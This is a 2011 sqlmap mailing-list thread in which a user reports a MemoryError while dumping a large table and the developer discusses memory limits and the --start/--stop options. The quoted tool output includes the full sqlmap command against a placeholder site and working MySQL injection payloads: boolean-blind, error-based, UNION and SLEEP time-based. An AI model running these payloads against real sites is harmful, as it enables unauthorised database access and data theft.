Re: [sqlmap-users] Memory problems
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Memory problems
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 15:12:55
|
yes, Bernardo warned me about this yesterday night :) we'll try to find something kr On Fri, Jan 28, 2011 at 4:02 PM, David Guimaraes <sk...@gm...> wrote: > --start and --stop are not working > > Sqlmap just ignore these parameter. i think when used with union injection > technique, these parameters are ignored(??). tried with --start 1 and --stop > 20. > > > On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar > <mir...@gm...> wrote: >> >> in the mean time you can try to use these: >> >> --start=LIMITSTART First query output entry to retrieve >> --stop=LIMITSTOP Last query output entry to retrieve >> >> kr >> >> On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar >> <mir...@gm...> wrote: >> > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html >> > >> > "A MemoryError exception is a built-in Python exception "Raised when an >> > operation runs out of memory but the situation may still be rescued >> > (by deleting some objects)." >> > >> > How many members does this list have? According to the FAQ, the largest >> > list reported to date has 147,000 members and presumably works. >> > Possibly something in the cPanel implementation or your particular >> > installation limits this to a greater degree." >> > >> > now, this messes our concept a bit but we'll try to adapt. >> > >> > kr >> > >> > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar >> > <mir...@gm...> wrote: >> >> LOL (50,350 entries in the table and 48 columns) >> >> >> >> we'll try to make some tests regarding this and report accordingly. >> >> haven't planed this kind of "huge" data retrievals :) >> >> >> >> kr >> >> >> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> >> >> wrote: >> >>> # ./sqlmap.py --method post --cookie >> >>> "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >> >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" >> >>> -v 3 >> >>> -D nomes -T class --dump >> >>> >> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover >> >>> tool >> >>> http://sqlmap.sourceforge.net >> >>> >> >>> [*] starting at: 16:58:05 >> >>> >> >>> [16:58:05] [DEBUG] cleaning up configuration parameters >> >>> [16:58:05] [DEBUG] setting the HTTP timeout >> >>> [16:58:05] [DEBUG] setting the HTTP Cookie header >> >>> [16:58:05] [DEBUG] setting the HTTP method to POST >> >>> [16:58:05] [DEBUG] creating HTTP requests opener object >> >>> [16:58:05] [INFO] using >> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >> >>> [16:58:05] [INFO] resuming injection data from session file >> >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >> >>> [16:58:05] [INFO] testing connection to the target url >> >>> you provided an HTTP Cookie header value. The target url provided its >> >>> own >> >>> Cookie within the HTTP Set-Cookie header. Do you want to continue >> >>> using the >> >>> HTTP Cookie values that you provided? [Y/n] >> >>> sqlmap identified the following injection points with a total of 0 >> >>> HTTP(s) >> >>> requests: >> >>> --- >> >>> Place: POST >> >>> Parameter: vulnparam >> >>> Type: boolean-based blind >> >>> Title: AND boolean-based blind - WHERE or HAVING clause >> >>> Payload: vulnparam=6 AND 5647=5647 >> >>> >> >>> Type: error-based >> >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >> >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) >> >>> THEN 1 >> >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >> >>> information_schema.tables GROUP BY x)a) >> >>> >> >>> Type: UNION query >> >>> Title: MySQL UNION query (NULL) - 4 to 7 columns >> >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >> >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS >> >>> CHAR), >> >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >> >>> >> >>> Type: AND/OR time-based blind >> >>> Title: MySQL > 5.0.11 AND time-based blind >> >>> Payload: vulnparam=6 AND SLEEP(5) >> >>> --- >> >>> >> >>> [16:58:06] [INFO] the back-end DBMS is MySQL >> >>> >> >>> web application technology: PHP 5.3.2 >> >>> back-end DBMS: MySQL 5.0 >> >>> [16:58:06] [INFO] fetching columns for table 'class' on database >> >>> 'nomes' >> >>> [16:58:06] [INFO] read from file >> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >> >>> [16:58:06] [INFO] fetching entries for table 'class' on database >> >>> 'nomes' >> >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >> >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, >> >>> NULL FROM >> >>> nomes.class# >> >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >> >>> >> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry >> >>> your run >> >>> with the latest development version from the Subversion repository. If >> >>> the >> >>> exception persists, please send by e-mail to >> >>> sql...@li... the command line, the following >> >>> text and >> >>> any information needed to reproduce the bug. The developers will try >> >>> to >> >>> reproduce the bug, fix it accordingly and get back to you. >> >>> sqlmap version: 0.9-dev >> >>> Python version: 2.6.5 >> >>> Operating system: posix >> >>> Traceback (most recent call last): >> >>> File "./sqlmap.py", line 83, in main >> >>> start() >> >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, >> >>> in >> >>> start >> >>> action() >> >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in >> >>> action >> >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >> >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line >> >>> 1189, in >> >>> dumpTable >> >>> entries = inject.getValue(query, blind=False, dump=True) >> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in >> >>> getValue >> >>> value = __goInband(query, expected, sort, resumeValue, unpack, >> >>> dump) >> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in >> >>> __goInband >> >>> data = parseUnionPage(output, expression, partial, None, sort) >> >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >> >>> parseUnionPage >> >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >> >>> kb.injection.place, conf.parameters[kb.injection.place], expression, >> >>> logOutput)) >> >>> MemoryError >> >>> >> >>> [*] shutting down at: 17:00:13 >> >>> >> >>> There are about 50,350 entries in the table and 48 columns.I tested >> >>> the >> >>> query manually, and returned a page with 600k of information.I think >> >>> that >> >>> sqlmap did not support the amount of data...? >> >>> >> >>> David >> >>> >> >>> >> >>> ------------------------------------------------------------------------------ >> >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >> >>> Finally, a world-class log management solution at an even better >> >>> price-free! >> >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >> >>> February 28th, so secure your free ArcSight Logger TODAY! >> >>> http://p.sf.net/sfu/arcsight-sfd2d >> >>> _______________________________________________ >> >>> sqlmap-users mailing list >> >>> sql...@li... >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >>> >> >>> >> >> >> >> >> >> >> >> -- >> >> Miroslav Stampar >> >> >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> >> Mobile: +385921010204 (HR 0921010204) >> >> PGP Key ID: 0xB5397B1B >> >> Location: Zagreb, Croatia >> >> >> > >> > >> > >> > -- >> > Miroslav Stampar >> > >> > E-mail / Jabber: miroslav.stampar (at) gmail.com >> > Mobile: +385921010204 (HR 0921010204) >> > PGP Key ID: 0xB5397B1B >> > Location: Zagreb, Croatia >> > >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia > > > > -- > David Gomes Guimarães > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
